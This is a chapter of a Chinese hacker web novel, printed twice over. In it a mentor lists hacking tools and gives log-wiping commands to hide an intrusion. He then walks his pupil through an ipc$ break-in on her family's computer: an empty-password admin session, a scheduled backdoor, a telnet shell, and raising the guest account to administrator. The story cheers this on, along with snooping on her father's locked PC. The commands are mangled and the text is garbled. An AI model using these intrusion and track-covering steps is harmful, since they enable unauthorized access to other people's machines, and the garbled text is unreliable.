幾天間。
慕秋除了關注與暗網相關的事情外,主要在輔導林苗苗基礎性的知識。
“師父,今天給我講什麽啊?”林苗苗在消息框裏問道。
慕秋迴答道:“你必須有一套自己可以完全掌握的黑客工具才行!”
林苗苗發了一個愁眉苦臉的表情,道:“這是什麽意思呢?您能不能具體的舉例一下,講解一下。”
慕秋冷笑了一聲,這姑娘果然沒有什麽天賦,還揚言要成為華夏第一女駭客,看來這輩子是沒有希望了。
有時候慕秋真的想把‘究極駭客係統’給林苗苗安裝了。
想必林苗苗比自己更需要這個係統吧?
“比如端口掃描nscan,bluescanport,監聽工具:sinfferiris,te工具:nc,掃描工具:sss,nmapnguard,後門工具:radmin,winshell,密碼破解:lc4,遠程管理:pcanywhere等!”
林苗苗發了一個ok。
“我大概明白了。”林苗苗道。
“而且在你入侵機器以後,離開的時候,要完全清除自己在那台機器上留下的痕跡。”
“例如清除delc:winntsystem32logfiles*.*,delc:winntsystem32*.log,delc:winntsystem32*.txt,delc:winnt*.log,delc:winnt*.txt。”
慕秋說道。
慕秋想道,我講的這麽明白,她應該清楚了吧?
如果再不清楚的話,隻能用豬來形容了。
果然,林苗苗沒有讓慕秋失望。
她果真還有疑惑。
林苗苗說道:“師父,你能不能具體給我示範下,親自入侵一下,然後再清除痕跡!”
慕秋頓時感到無語。
怎麽教一個徒弟這麽費勁。
潘元就夠笨了。
但是也沒有林苗苗這麽笨啊!
杜家全更不需要多說,講解一遍就清楚了。
慕秋說道:“好吧,那我就直接入侵你家的電腦了。”
林苗苗詫異道:“你居然能定位到我家電腦?”
慕秋淡淡道:“隻要有網絡的地方,我就可以定位到。”
其實,即使沒有網絡的電腦,他也可以通過係統定位準確的定位到。
林苗苗發了一個崇拜的表情包,道:“師父,你是我偶像。”
隨後慕秋就開啟了一個直播。
開始為林苗苗施展。
“我運用的是一套非常基礎的ipc$入侵。”慕秋通過直播講解道。
林苗苗問道:“什麽是ipc$?”
“ipc$全稱為inteprocessconnection是共享命名管道的資源。”慕秋繼續說道。
“它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。”
林苗苗則拿出來了一個小本本開始記筆記了。
“利用ipc$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼,而利用這個空的連接,連接者還可以得到目標主機上的用戶列表。”
“如何打開目標的ipc$,首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、te、木馬。”
“當然,這shell必須是admin權限的,然後你可以使用shell執行命shareipc$,來開放目標的ipc$。”
“從上麵可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行。”
cuse127.0.0.1ipc$/user:admintitrators
顯示用戶名是administrators,密碼為空的ip地址
慕秋先複製srv.exe上去,ctime127.0.0.1
查看完時間後,命令成功完成。
c:at127.0.0.111:05srv.exe
用at命令啟動srv.exe
ctime127.0.0.1
然後用到te命令,端口是99。te默認的是23端口,使用的是srv在對方計算機中為建立一個99端口的shell。
用copy命令把ntlm.exe上傳到主機上。
c:winntsystem32ntlm
==輸入ntlm啟動,當出現done的時候,就說明已經啟動正常。然後使startte來開啟e服務!
te127.0.0.1,接著輸入用戶名與密碼就進入對方裏。
再把guest激活加到管理組
cuserguest/active:yes
將對方的guest用戶激活
cuserguest1234
將guest的密碼改為1234
clocalgroupadministratorsguest/add
將guest變為administrator.
慕秋在邊講解的時候,就已經入侵了林苗苗家內的一台電腦。
不過這台電腦並不是林苗苗的。
應該是她家人的。
“竟然真的成功了?!”林苗苗驚喜道,“看樣子應該是我爸爸的電腦啊,我還從來沒有看過他電腦呢,他在電腦裏設置了密碼,每次都不讓我看,師父,快讓我看看裏麵有什麽!”
慕秋除了關注與暗網相關的事情外,主要在輔導林苗苗基礎性的知識。
“師父,今天給我講什麽啊?”林苗苗在消息框裏問道。
慕秋迴答道:“你必須有一套自己可以完全掌握的黑客工具才行!”
林苗苗發了一個愁眉苦臉的表情,道:“這是什麽意思呢?您能不能具體的舉例一下,講解一下。”
慕秋冷笑了一聲,這姑娘果然沒有什麽天賦,還揚言要成為華夏第一女駭客,看來這輩子是沒有希望了。
有時候慕秋真的想把‘究極駭客係統’給林苗苗安裝了。
想必林苗苗比自己更需要這個係統吧?
“比如端口掃描nscan,bluescanport,監聽工具:sinfferiris,te工具:nc,掃描工具:sss,nmapnguard,後門工具:radmin,winshell,密碼破解:lc4,遠程管理:pcanywhere等!”
林苗苗發了一個ok。
“我大概明白了。”林苗苗道。
“而且在你入侵機器以後,離開的時候,要完全清除自己在那台機器上留下的痕跡。”
“例如清除delc:winntsystem32logfiles*.*,delc:winntsystem32*.log,delc:winntsystem32*.txt,delc:winnt*.log,delc:winnt*.txt。”
慕秋說道。
慕秋想道,我講的這麽明白,她應該清楚了吧?
如果再不清楚的話,隻能用豬來形容了。
果然,林苗苗沒有讓慕秋失望。
她果真還有疑惑。
林苗苗說道:“師父,你能不能具體給我示範下,親自入侵一下,然後再清除痕跡!”
慕秋頓時感到無語。
怎麽教一個徒弟這麽費勁。
潘元就夠笨了。
但是也沒有林苗苗這麽笨啊!
杜家全更不需要多說,講解一遍就清楚了。
慕秋說道:“好吧,那我就直接入侵你家的電腦了。”
林苗苗詫異道:“你居然能定位到我家電腦?”
慕秋淡淡道:“隻要有網絡的地方,我就可以定位到。”
其實,即使沒有網絡的電腦,他也可以通過係統定位準確的定位到。
林苗苗發了一個崇拜的表情包,道:“師父,你是我偶像。”
隨後慕秋就開啟了一個直播。
開始為林苗苗施展。
“我運用的是一套非常基礎的ipc$入侵。”慕秋通過直播講解道。
林苗苗問道:“什麽是ipc$?”
“ipc$全稱為inteprocessconnection是共享命名管道的資源。”慕秋繼續說道。
“它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。”
林苗苗則拿出來了一個小本本開始記筆記了。
“利用ipc$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼,而利用這個空的連接,連接者還可以得到目標主機上的用戶列表。”
“如何打開目標的ipc$,首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、te、木馬。”
“當然,這shell必須是admin權限的,然後你可以使用shell執行命shareipc$,來開放目標的ipc$。”
“從上麵可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行。”
cuse127.0.0.1ipc$/user:admintitrators
顯示用戶名是administrators,密碼為空的ip地址
慕秋先複製srv.exe上去,ctime127.0.0.1
查看完時間後,命令成功完成。
c:at127.0.0.111:05srv.exe
用at命令啟動srv.exe
ctime127.0.0.1
然後用到te命令,端口是99。te默認的是23端口,使用的是srv在對方計算機中為建立一個99端口的shell。
用copy命令把ntlm.exe上傳到主機上。
c:winntsystem32ntlm
==輸入ntlm啟動,當出現done的時候,就說明已經啟動正常。然後使startte來開啟e服務!
te127.0.0.1,接著輸入用戶名與密碼就進入對方裏。
再把guest激活加到管理組
cuserguest/active:yes
將對方的guest用戶激活
cuserguest1234
將guest的密碼改為1234
clocalgroupadministratorsguest/add
將guest變為administrator.
慕秋在邊講解的時候,就已經入侵了林苗苗家內的一台電腦。
不過這台電腦並不是林苗苗的。
應該是她家人的。
“竟然真的成功了?!”林苗苗驚喜道,“看樣子應該是我爸爸的電腦啊,我還從來沒有看過他電腦呢,他在電腦裏設置了密碼,每次都不讓我看,師父,快讓我看看裏麵有什麽!”